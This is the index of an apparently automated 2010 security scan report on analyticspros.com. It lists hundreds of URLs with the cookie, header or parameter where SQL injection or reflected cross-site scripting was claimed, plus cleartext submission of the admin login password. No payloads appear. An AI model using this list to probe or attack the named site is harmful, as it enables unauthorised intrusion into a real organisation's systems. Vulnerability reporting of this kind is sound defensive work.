Manually Confirmed XSS (All) | SQL Injection Audited and Confirmed (Various)

Report generated by Hoyt LLC Research at Sat Nov 06 10:30:36 EDT 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. SQL injection

Loading

1.1. http://www.analyticspros.com/ [ki_t cookie]

1.2. http://www.analyticspros.com/about/ [User-Agent HTTP header]

1.3. http://www.analyticspros.com/administrator/ [Referer HTTP header]

1.4. http://www.analyticspros.com/administrator/templates/khepri/favicon.ico [REST URL parameter 3]

1.5. http://www.analyticspros.com/blog.html [__utmmobile cookie]

1.6. http://www.analyticspros.com/blog.html [apros2.0_tpl cookie]

1.7. http://www.analyticspros.com/blog.html [name of an arbitrarily supplied request parameter]

1.8. http://www.analyticspros.com/blog.html [optimizelyEndUserId cookie]

1.9. http://www.analyticspros.com/blog.html [utm_campaign parameter]

1.10. http://www.analyticspros.com/blog.html [utm_source parameter]

1.11. http://www.analyticspros.com/blog/55-googleanalytics.html [__utma cookie]

1.12. http://www.analyticspros.com/blog/55-googleanalytics.html [__utmc cookie]

1.13. http://www.analyticspros.com/blog/55-googleanalytics/ [apros2.0_tpl cookie]

1.14. http://www.analyticspros.com/blog/55-googleanalytics/ [ki_u cookie]

1.15. http://www.analyticspros.com/blog/55-googleanalytics/ [name of an arbitrarily supplied request parameter]

1.16. http://www.analyticspros.com/blog/55-googleanalytics/ [optimizelyBuckets cookie]

1.17. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [REST URL parameter 1]

1.18. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [User-Agent HTTP header]

1.19. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [__utmb cookie]

1.20. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html [REST URL parameter 2]

1.21. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html [__utmc cookie]

1.22. http://www.analyticspros.com/blog/55-googleanalytics/106-google-analytics-health-check.html [REST URL parameter 2]

1.23. http://www.analyticspros.com/blog/55-googleanalytics/106-google-analytics-health-check.html [apros2.0_tpl cookie]

1.24. http://www.analyticspros.com/blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html [name of an arbitrarily supplied request parameter]

1.25. http://www.analyticspros.com/blog/55-googleanalytics/113-domain-hostname-content-reports.html [ki_u cookie]

1.26. http://www.analyticspros.com/blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html [Referer HTTP header]

1.27. http://www.analyticspros.com/blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html [__utmc cookie]

1.28. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [REST URL parameter 2]

1.29. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [__utmmobile cookie]

1.30. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [optimizelyEndUserId cookie]

1.31. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [__utmb cookie]

1.32. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [__utmz cookie]

1.33. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [itemid parameter]

1.34. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html [__utmmobile cookie]

1.35. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html [ki_t cookie]

1.36. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html [__utma cookie]

1.37. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.38. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html [__utma cookie]

1.39. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html [fpssCookie cookie]

1.40. http://www.analyticspros.com/blog/55-googleanalytics/86-google-analytics-intelligence.html [__utmmobile cookie]

1.41. http://www.analyticspros.com/blog/55-googleanalytics/89-dont-kill-the-messenger.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.42. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [REST URL parameter 2]

1.43. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [User-Agent HTTP header]

1.44. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [__utmz cookie]

1.45. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [ki_t cookie]

1.46. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utma cookie]

1.47. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utmb cookie]

1.48. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [apros2.0_tpl cookie]

1.49. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.50. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.51. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html [apros2.0_tpl cookie]

1.52. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 3]

1.53. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html [name of an arbitrarily supplied request parameter]

1.54. http://www.analyticspros.com/blog/56-seo/59-search-ranking-position-with-ga.html [__utmmobile cookie]

1.55. http://www.analyticspros.com/blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.56. http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html [__utmz cookie]

1.57. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [REST URL parameter 3]

1.58. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [__utmc cookie]

1.59. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [__utmmobile cookie]

1.60. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [apros2.0_tpl cookie]

1.61. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [ki_u cookie]

1.62. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.63. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html [ki_u cookie]

1.64. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.65. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html [optimizelyEndUserId cookie]

1.66. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [REST URL parameter 1]

1.67. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.68. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [name of an arbitrarily supplied request parameter]

1.69. http://www.analyticspros.com/blog/62-urchin/94-exclude-bots-in-urchin.html [__utmz cookie]

1.70. http://www.analyticspros.com/blog/googleanalytics.feed [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.71. http://www.analyticspros.com/blog/googleanalytics.feed [__utmmobile cookie]

1.72. http://www.analyticspros.com/blog/googleanalytics.feed [optimizelyEndUserId cookie]

1.73. http://www.analyticspros.com/blog/googleanalytics.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.74. http://www.analyticspros.com/blog/googleanalytics.html [REST URL parameter 1]

1.75. http://www.analyticspros.com/blog/googleanalytics.html [REST URL parameter 2]

1.76. http://www.analyticspros.com/blog/googleanalytics.html [User-Agent HTTP header]

1.77. http://www.analyticspros.com/blog/googleanalytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.78. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [REST URL parameter 1]

1.79. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [__utmmobile cookie]

1.80. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [optimizelyEndUserId cookie]

1.81. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [7876d45a49f537da76cfb9e129203eee cookie]

1.82. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [Referer HTTP header]

1.83. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [apros2.0_tpl cookie]

1.84. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [optimizelyBuckets cookie]

1.85. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [REST URL parameter 3]

1.86. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [fpssCookie cookie]

1.87. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [ki_t cookie]

1.88. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [ki_u cookie]

1.89. http://www.analyticspros.com/blog/googleanalytics/109-google-analytics-training-san-jose-2010.html [ki_t cookie]

1.90. http://www.analyticspros.com/blog/googleanalytics/113-domain-hostname-content-reports.html [ki_t cookie]

1.91. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [REST URL parameter 1]

1.92. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.93. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [ki_t cookie]

1.94. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [ki_t cookie]

1.95. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [name of an arbitrarily supplied request parameter]

1.96. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [REST URL parameter 3]

1.97. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [Referer HTTP header]

1.98. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [optimizelyEndUserId cookie]

1.99. http://www.analyticspros.com/blog/googleanalytics/60-ga-extended-segments-part-1.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.100. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html [REST URL parameter 3]

1.101. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.102. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.103. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [__utma cookie]

1.104. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [__utmz cookie]

1.105. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [ki_t cookie]

1.106. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [ki_u cookie]

1.107. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [name of an arbitrarily supplied request parameter]

1.108. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [Referer HTTP header]

1.109. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [__utmc cookie]

1.110. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [__utmmobile cookie]

1.111. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [fpssCookie cookie]

1.112. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [ki_t cookie]

1.113. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [7876d45a49f537da76cfb9e129203eee cookie]

1.114. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [REST URL parameter 3]

1.115. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [__utmz cookie]

1.116. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [apros2.0_tpl cookie]

1.117. http://www.analyticspros.com/blog/googleanalytics/91-google-analytics-cookies-and-domains.html [REST URL parameter 1]

1.118. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [User-Agent HTTP header]

1.119. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utma cookie]

1.120. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utmc cookie]

1.121. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [apros2.0_tpl cookie]

1.122. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [optimizelyEndUserId cookie]

1.123. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utma cookie]

1.124. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utmmobile cookie]

1.125. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utmmobile cookie]

1.126. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [ki_t cookie]

1.127. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [name of an arbitrarily supplied request parameter]

1.128. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 1]

1.129. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 3]

1.130. http://www.analyticspros.com/blog/seo.feed [apros2.0_tpl cookie]

1.131. http://www.analyticspros.com/blog/seo.feed [fpssCookie cookie]

1.132. http://www.analyticspros.com/blog/seo.feed [type parameter]

1.133. http://www.analyticspros.com/blog/seo.html [User-Agent HTTP header]

1.134. http://www.analyticspros.com/blog/seo/ [Referer HTTP header]

1.135. http://www.analyticspros.com/blog/seo/ [apros2.0_tpl cookie]

1.136. http://www.analyticspros.com/blog/seo/ [fpssCookie cookie]

1.137. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html [User-Agent HTTP header]

1.138. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html [optimizelyBuckets cookie]

1.139. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html [ki_u cookie]

1.140. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html [optimizelyBuckets cookie]

1.141. http://www.analyticspros.com/blog/urchin.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.142. http://www.analyticspros.com/blog/urchin/118-urchin-7-now-available.html [ki_t cookie]

1.143. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [REST URL parameter 3]

1.144. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [apros2.0_tpl cookie]

1.145. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [optimizelyBuckets cookie]

1.146. http://www.analyticspros.com/blog/urchin/87-visitor-scoring-with-urchin.html [REST URL parameter 2]

1.147. http://www.analyticspros.com/blog/urchin/87-visitor-scoring-with-urchin.html [ki_u cookie]

1.148. http://www.analyticspros.com/blog/urchin/88-urchin-vs-google-analytics.html [name of an arbitrarily supplied request parameter]

1.149. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html [__utma cookie]

1.150. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html [ki_u cookie]

1.151. http://www.analyticspros.com/blog/webanalytics.html [REST URL parameter 2]

1.152. http://www.analyticspros.com/blog/webanalytics.html [apros2.0_tpl cookie]

1.153. http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html [__utmmobile cookie]

1.154. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [User-Agent HTTP header]

1.155. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [__utmc cookie]

1.156. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [__utmmobile cookie]

1.157. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [itemid parameter]

1.158. http://www.analyticspros.com/component/jsetup/comment/ [REST URL parameter 1]

1.159. http://www.analyticspros.com/component/jsetup/comment/ [REST URL parameter 3]

1.160. http://www.analyticspros.com/component/jsetup/comment/ [Referer HTTP header]

1.161. http://www.analyticspros.com/component/jsetup/comment/add.html [REST URL parameter 2]

1.162. http://www.analyticspros.com/component/jsetup/comment/add.html [REST URL parameter 4]

1.163. http://www.analyticspros.com/component/jsetup/comment/add.html [User-Agent HTTP header]

1.164. http://www.analyticspros.com/component/jsetup/comment/add.html [__utmc cookie]

1.165. http://www.analyticspros.com/component/jsetup/comment/add.html [__utmc cookie]

1.166. http://www.analyticspros.com/component/jsetup/comment/add.html [apros2.0_tpl cookie]

1.167. http://www.analyticspros.com/component/jsetup/comment/add.html [commenttype parameter]

1.168. http://www.analyticspros.com/component/jsetup/comment/add.html [fpssCookie cookie]

1.169. http://www.analyticspros.com/component/jsetup/comment/add.html [fpssCookie cookie]

1.170. http://www.analyticspros.com/component/jsetup/comment/add.html [ki_t cookie]

1.171. http://www.analyticspros.com/component/jsetup/comment/function.mysql-connect [ki_t cookie]

1.172. http://www.analyticspros.com/component/jsetup/comment/function.mysql-connect [name of an arbitrarily supplied request parameter]

1.173. http://www.analyticspros.com/components/com_chronocontact/css/images/ [REST URL parameter 2]

1.174. http://www.analyticspros.com/components/com_chronocontact/themes/theme1/ [REST URL parameter 2]

1.175. http://www.analyticspros.com/consulting.html [Referer HTTP header]

1.176. http://www.analyticspros.com/consulting.html [User-Agent HTTP header]

1.177. http://www.analyticspros.com/consulting.html [ki_t cookie]

1.178. http://www.analyticspros.com/consulting.html [ki_u cookie]

1.179. http://www.analyticspros.com/images/stories/blogimg/ [REST URL parameter 1]

1.180. http://www.analyticspros.com/images/stories/products/healtcheck/ [REST URL parameter 2]

1.181. http://www.analyticspros.com/index.php [Itemid parameter]

1.182. http://www.analyticspros.com/index.php [REST URL parameter 1]

1.183. http://www.analyticspros.com/index.php [Referer HTTP header]

1.184. http://www.analyticspros.com/index.php [User-Agent HTTP header]

1.185. http://www.analyticspros.com/index.php [User-Agent HTTP header]

1.186. http://www.analyticspros.com/index.php [__utma cookie]

1.187. http://www.analyticspros.com/index.php [__utmb cookie]

1.188. http://www.analyticspros.com/index.php [__utmc cookie]

1.189. http://www.analyticspros.com/index.php [__utmz cookie]

1.190. http://www.analyticspros.com/index.php [__utmz cookie]

1.191. http://www.analyticspros.com/index.php [apros2.0_tpl cookie]

1.192. http://www.analyticspros.com/index.php [commenttype parameter]

1.193. http://www.analyticspros.com/index.php [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.194. http://www.analyticspros.com/index.php [eid parameter]

1.195. http://www.analyticspros.com/index.php [etid parameter]

1.196. http://www.analyticspros.com/index.php [file_17 parameter]

1.197. http://www.analyticspros.com/index.php [fpssCookie cookie]

1.198. http://www.analyticspros.com/index.php [ki_u cookie]

1.199. http://www.analyticspros.com/index.php [ki_u cookie]

1.200. http://www.analyticspros.com/index.php [name of an arbitrarily supplied request parameter]

1.201. http://www.analyticspros.com/index.php [optimizelyBuckets cookie]

1.202. http://www.analyticspros.com/index.php [optimizelyBuckets cookie]

1.203. http://www.analyticspros.com/index.php [optimizelyEndUserId cookie]

1.204. http://www.analyticspros.com/index.php [option parameter]

1.205. http://www.analyticspros.com/index.php [undefined parameter]

1.206. http://www.analyticspros.com/joobi/user/media/images/captcha/ [REST URL parameter 3]

1.207. http://www.analyticspros.com/modules/mod_fpss/includes/elements/categories.php [REST URL parameter 1]

1.208. http://www.analyticspros.com/modules/mod_fpss/includes/elements/categories.php [REST URL parameter 5]

1.209. http://www.analyticspros.com/modules/mod_fpss/includes/elements/header.php [REST URL parameter 5]

1.210. http://www.analyticspros.com/modules/mod_fpss/tmpl/ [REST URL parameter 1]

1.211. http://www.analyticspros.com/plugins/system/pc_includes/JSON.php [REST URL parameter 1]

1.212. http://www.analyticspros.com/products.html [name of an arbitrarily supplied request parameter]

1.213. http://www.analyticspros.com/products/ [User-Agent HTTP header]

1.214. http://www.analyticspros.com/products/ [__utmmobile cookie]

1.215. http://www.analyticspros.com/products/ [ki_t cookie]

1.216. http://www.analyticspros.com/products/63-urchin.html [apros2.0_tpl cookie]

1.217. http://www.analyticspros.com/products/63-urchin/119-urchin-6.html [__utmc cookie]

1.218. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html [User-Agent HTTP header]

1.219. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.220. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html [ki_t cookie]

1.221. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html [optimizelyEndUserId cookie]

1.222. http://www.analyticspros.com/products/63-urchin/70-urchin.html [Referer HTTP header]

1.223. http://www.analyticspros.com/products/63-urchin/70-urchin.html [__utma cookie]

1.224. http://www.analyticspros.com/products/63-urchin/70-urchin.html [ki_t cookie]

1.225. http://www.analyticspros.com/products/63-urchin/70-urchin.html [optimizelyEndUserId cookie]

1.226. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html [ki_t cookie]

1.227. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html [ki_u cookie]

1.228. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html [optimizelyBuckets cookie]

1.229. http://www.analyticspros.com/products/64-data-warehouse/ [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.230. http://www.analyticspros.com/products/65-ae/ [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.231. http://www.analyticspros.com/products/65-ae/110-analytics-engine.html [__utmmobile cookie]

1.232. http://www.analyticspros.com/products/65-ae/function.mysql-connect [apros2.0_tpl cookie]

1.233. http://www.analyticspros.com/resources.html [__utmc cookie]

1.234. http://www.analyticspros.com/resources.html [optimizelyBuckets cookie]

1.235. http://www.analyticspros.com/resources/ [fpssCookie cookie]

1.236. http://www.analyticspros.com/resources/ [ki_t cookie]

1.237. http://www.analyticspros.com/resources/123-dimensionator-install.html [User-Agent HTTP header]

1.238. http://www.analyticspros.com/resources/123-dimensionator-install.html [__utma cookie]

1.239. http://www.analyticspros.com/resources/123-dimensionator-install.html [name of an arbitrarily supplied request parameter]

1.240. http://www.analyticspros.com/resources/64-campaign-tracker.html [optimizelyEndUserId cookie]

1.241. http://www.analyticspros.com/resources/90-analytics-toolbar.html [REST URL parameter 1]

1.242. http://www.analyticspros.com/resources/90-analytics-toolbar.html [__utmz cookie]

1.243. http://www.analyticspros.com/resources/90-analytics-toolbar.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.244. http://www.analyticspros.com/resources/campaign-url-builder.html [REST URL parameter 2]

1.245. http://www.analyticspros.com/resources/campaign-url-builder.html [ki_t cookie]

1.246. http://www.analyticspros.com/resources/campaign-url-builder.html [optimizelyBuckets cookie]

1.247. http://www.analyticspros.com/resources/feeds.html [REST URL parameter 2]

1.248. http://www.analyticspros.com/resources/feeds.html [Referer HTTP header]

1.249. http://www.analyticspros.com/resources/feeds.html [__utmc cookie]

1.250. http://www.analyticspros.com/resources/feeds.html [ki_u cookie]

1.251. http://www.analyticspros.com/resources/feeds.html [optimizelyBuckets cookie]

1.252. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/12-canalytics-blog.html [Referer HTTP header]

1.253. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/12-canalytics-blog.html [__utmmobile cookie]

1.254. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.255. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html [__utmz cookie]

1.256. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/14-pure-visibility.html [Referer HTTP header]

1.257. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/14-pure-visibility.html [__utmz cookie]

1.258. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html [REST URL parameter 3]

1.259. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html [Referer HTTP header]

1.260. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html [ki_t cookie]

1.261. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html [optimizelyEndUserId cookie]

1.262. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/16-vki-studios-blog.html [__utmc cookie]

1.263. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/16-vki-studios-blog.html [ki_u cookie]

1.264. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/9-epik-blog.html [__utmc cookie]

1.265. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/9-epik-blog.html [__utmmobile cookie]

1.266. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/9-epik-blog.html [__utmz cookie]

1.267. http://www.analyticspros.com/resources/feeds/37-ga-support-forums.html [__utmz cookie]

1.268. http://www.analyticspros.com/resources/feeds/37-ga-support-forums.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.269. http://www.analyticspros.com/resources/function.mysql-connect [User-Agent HTTP header]

1.270. http://www.analyticspros.com/resources/function.mysql-connect [__utmb cookie]

1.271. http://www.analyticspros.com/resources/function.mysql-connect [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.272. http://www.analyticspros.com/resources/healthcheck.html [__utmc cookie]

1.273. http://www.analyticspros.com/resources/healthcheck/run-healthcheck.html [REST URL parameter 1]

1.274. http://www.analyticspros.com/resources/healthcheck/run-healthcheck.html [REST URL parameter 2]

1.275. http://www.analyticspros.com/resources/healthcheck/run-healthcheck.html [Referer HTTP header]

1.276. http://www.analyticspros.com/resources/healthcheck/run-healthcheck.html [name of an arbitrarily supplied request parameter]

1.277. http://www.analyticspros.com/templates/apros2.0/js/ [REST URL parameter 3]

1.278. http://www.analyticspros.com/templates/system/ [REST URL parameter 2]

1.279. http://www.analyticspros.com/training.html [__utma cookie]

1.280. http://www.analyticspros.com/training.html [apros2.0_tpl cookie]

1.281. http://www.analyticspros.com/training.html [ki_t cookie]

1.282. http://www.analyticspros.com/urchin.html [__utmc cookie]

1.283. http://www.analyticspros.com/urchin.html [ki_t cookie]

2. Cross-site scripting (reflected)

2.1. http://www.analyticspros.com/blog.html [name of an arbitrarily supplied request parameter]

2.2. http://www.analyticspros.com/blog/ [name of an arbitrarily supplied request parameter]

2.3. http://www.analyticspros.com/blog/55-googleanalytics.html [name of an arbitrarily supplied request parameter]

2.4. http://www.analyticspros.com/blog/62-urchin.html [name of an arbitrarily supplied request parameter]

2.5. http://www.analyticspros.com/blog/62-urchin/ [name of an arbitrarily supplied request parameter]

2.6. http://www.analyticspros.com/blog/googleanalytics.feed [name of an arbitrarily supplied request parameter]

2.7. http://www.analyticspros.com/blog/googleanalytics.html [name of an arbitrarily supplied request parameter]

2.8. http://www.analyticspros.com/blog/googleanalytics/ [name of an arbitrarily supplied request parameter]

2.9. http://www.analyticspros.com/blog/seo.feed [name of an arbitrarily supplied request parameter]

2.10. http://www.analyticspros.com/blog/seo/ [name of an arbitrarily supplied request parameter]

2.11. http://www.analyticspros.com/blog/urchin.feed [name of an arbitrarily supplied request parameter]

2.12. http://www.analyticspros.com/blog/urchin.html [name of an arbitrarily supplied request parameter]

2.13. http://www.analyticspros.com/blog/urchin/ [name of an arbitrarily supplied request parameter]

2.14. http://www.analyticspros.com/blog/webanalytics.feed [name of an arbitrarily supplied request parameter]

2.15. http://www.analyticspros.com/component/jsetup/comment/add.html [REST URL parameter 4]

2.16. http://www.analyticspros.com/component/jsetup/comment/add.html [name of an arbitrarily supplied request parameter]

2.17. http://www.analyticspros.com/component/jsetup/comment/add.html [titleheader parameter]

2.18. http://www.analyticspros.com/index.php [format parameter]

2.19. http://www.analyticspros.com/index.php [name of an arbitrarily supplied request parameter]

2.20. http://www.analyticspros.com/index.php [name of an arbitrarily supplied request parameter]

2.21. http://www.analyticspros.com/index.php [titleheader parameter]

2.22. http://www.analyticspros.com/products.html [name of an arbitrarily supplied request parameter]

2.23. http://www.analyticspros.com/products/ [name of an arbitrarily supplied request parameter]

3. Cleartext submission of password

3.1. http://www.analyticspros.com/administrator/

3.2. http://www.analyticspros.com/administrator/index.php

4. Referer-dependent response

4.1. http://www.analyticspros.com/about.html

4.2. http://www.analyticspros.com/blog.html

4.3. http://www.analyticspros.com/blog/55-googleanalytics.html

4.4. http://www.analyticspros.com/blog/googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

4.5. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

4.6. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html
